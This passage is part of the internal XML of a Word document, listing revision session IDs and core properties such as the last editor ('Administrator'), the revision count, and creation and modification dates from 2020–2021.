    <w:rsid w:val="00367A4E"/>
    <w:rsid w:val="0038143D"/>
    <w:rsid w:val="0038518B"/>
    <w:rsid w:val="00404929"/>
    <w:rsid w:val="00497E80"/>
    <w:rsid w:val="00540371"/>
    <w:rsid w:val="00620487"/>
    <w:rsid w:val="006246D0"/>
    <w:rsid w:val="00633542"/>
    <w:rsid w:val="006954C6"/>
    <w:rsid w:val="00743925"/>
    <w:rsid w:val="00752416"/>
    <w:rsid w:val="00774F17"/>
    <w:rsid w:val="0087520A"/>
    <w:rsid w:val="008A31EE"/>
    <w:rsid w:val="008E6B0E"/>
    <w:rsid w:val="00A06C46"/>
    <w:rsid w:val="00A2141D"/>
    <w:rsid w:val="00B30BD7"/>
    <w:rsid w:val="00B75A94"/>
    <w:rsid w:val="00B84AAC"/>
    <w:rsid w:val="00C648AF"/>
    <w:rsid w:val="00CC711A"/>
    <w:rsid w:val="00D24852"/>
    <w:rsid w:val="00D44256"/>
    <w:rsid w:val="00E25593"/>
    <w:rsid w:val="00EA68C7"/>
    <w:rsid w:val="00ED64D1"/>
    <w:rsid w:val="00F03A06"/>
    <w:rsid w:val="00F61BCF"/>
    <w:rsid w:val="00FB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A0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B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BD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A0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B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B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Administrator</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <cp:lastPrinted>2020-09-23T07:16:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-08T07:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-01T09:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>